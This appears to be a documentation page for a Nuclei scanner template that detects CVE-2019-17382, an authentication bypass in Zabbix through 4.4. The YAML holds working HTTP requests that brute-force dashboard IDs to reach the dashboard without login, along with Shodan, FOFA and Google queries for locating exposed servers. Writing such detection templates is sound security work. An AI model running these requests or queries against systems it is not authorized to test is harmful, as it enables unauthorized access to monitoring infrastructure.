Zabbix <=4.4 - Authentication Bypass
ID: CVE-2019-17382
Severity: critical
Author: harshbothra_
Tags: cve2019,cve,auth-bypass,login,edb,zabbix
Description
Section titled “Description”Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
YAML Source
Section titled “YAML Source”id: CVE-2019-17382
info: name: Zabbix <=4.4 - Authentication Bypass author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. impact: | Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application. remediation: | Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47467 - https://nvd.nist.gov/vuln/detail/CVE-2019-17382 - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html - https://github.com/huimzjty/vulwiki - https://github.com/merlinepedra25/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 epss-score: 0.3552 epss-percentile: 0.97136 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 vendor: zabbix product: zabbix shodan-query: - http.favicon.hash:892542951 - http.title:"zabbix-server" - cpe:"cpe:2.3:a:zabbix:zabbix" fofa-query: - icon_hash=892542951 - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve2019,cve,auth-bypass,login,edb,zabbix
flow: http(1) && http(2)
http: - raw: - | GET {{path}} HTTP/1.1 Host: {{Hostname}}
payloads: path: - / - /zabbix.php - /zabbix/zabbix.php
stop-at-first-match: true matchers: - type: dsl dsl: - 'contains_any(tolower(body), "<title>warning [refreshed every", "zabbix-logo", "content=\"zabbix sia")' internal: true
- raw: - | GET {{path}}?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}}
payloads: path: - /zabbix.php - /zabbix/zabbix.php ids: helpers/wordlists/numbers.txt attack: clusterbomb
stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "<title>Dashboard</title>"
- type: status status: - 200# digest: 4a0a004730450221008930a2e278a437112ca2edb5b44d774ed69202fe9aaabefa6a98451ff62395b00220671676f8f0cb9821650aca3a1b8a4b3567ad35f01b74cc3ac1dde035781f2f1d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-17382.yaml"